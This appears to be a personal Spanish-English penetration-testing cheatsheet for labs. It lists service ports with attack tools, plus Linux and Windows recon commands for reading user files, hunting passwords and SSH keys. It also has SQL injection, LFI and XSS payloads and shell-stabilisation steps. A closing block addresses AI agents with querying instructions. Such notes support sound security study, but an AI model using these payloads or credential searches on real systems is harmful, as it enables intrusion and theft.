# Cheatsheets

> **"Memorizar es inútil. Tener buenas notas es vital."**

## 🌐 Common Ports & Services (Quick Reference)

| Port        | Service  | Tool / Command                            |
| ----------- | -------- | ----------------------------------------- |
| **21**      | FTP      | `ftp <IP>` (Anonymous?)                   |
| **22**      | SSH      | `ssh user@<IP>` / `hydra`                 |
| **23**      | Telnet   | `telnet <IP>` (Sniffing?)                 |
| **25**      | SMTP     | `nc <IP> 25` (VRFY/EXPN)                  |
| **53**      | DNS      | `dig axfr @<IP>` (Zone Transfer)          |
| **80/443**  | HTTP/S   | `whatweb`, `feroxbuster`, `nuclei`        |
| **88**      | Kerberos | `kerbrute`, `impacket-GetUserSPNs`        |
| **139/445** | SMB      | `enum4linux`, `crackmapexec`, `smbclient` |
| **389/636** | LDAP     | `ldapsearch`, `windapsearch`              |
| **1433**    | MSSQL    | `impacket-mssqlclient`                    |
| **3306**    | MySQL    | `mysql -u root -h <IP>`                   |
| **3389**    | RDP      | `xfreerdp /u:user /p:pass /v:<IP>`        |
| **5985**    | WinRM    | `evil-winrm -i <IP>`                      |

## 🐧 Linux Quick Recon

### System & Users

```bash
uname -a; cat /etc/issue; cat /etc/*-release
cat /etc/passwd | grep sh$ # Usuarios con shell
lastlog | grep -v "Never"
w; whoami; id
```

### Network

```bash
ip a; ip route; cat /etc/hosts
netstat -antup | grep LISTEN
ss -lntu
```

### Finding Secrets

```bash
grep -Ur "password" /var/www/html 2>/dev/null
find / -name "id_rsa" 2>/dev/null
history | grep "ssh"
env
```

## 🏰 Windows Quick Recon

### System & Users

```cmd
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
whoami /priv
net user <username>
net localgroup administrators
```

### Network

```cmd
ipconfig /all
netstat -ano | findstr LISTEN
type C:\Windows\System32\drivers\etc\hosts
```

### Finding Secrets

```cmd
findstr /si password *.txt *.ini *.xml *.config
reg query HKLM /f password /t REG_SZ /s
```

## 🕸️ Web Attacks One-Liners

### SQL Injection (Auth Bypass)

* `' OR 1=1-- -`
* `admin' --`
* `" OR "" = "`

### LFI (Local File Inclusion)

* `../../../../etc/passwd`
* `....//....//....//etc/passwd`
* `php://filter/convert.base64-encode/resource=index.php`

### XSS (Cross-Site Scripting)

* `<script>alert(1)</script>`
* `<img src=x onerror=alert(1)>`
* `<svg/onload=alert(1)>`

## ⌨️ TTY Stabilization (Full Interactive Shell)

1. **Python**: `python3 -c 'import pty; pty.spawn("/bin/bash")'`
2. **Background**: `Ctrl + Z`
3. **Stty**: `stty raw -echo; fg`
4. **Reset**: `export TERM=xterm`

## 🔗 Top Resources

* [PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings)
* [HackTricks](https://book.hacktricks.xyz/)
* [GTFOBins](https://gtfobins.github.io/) / [LOLBAS](https://lolbas-project.github.io/)
* [RevShells.com](https://www.revshells.com/) - Generador de Shells Online.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://jotatito05.gitbook.io/la-bitacora-de-jotatito05/99.-labs-and-resources/cheatsheets.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.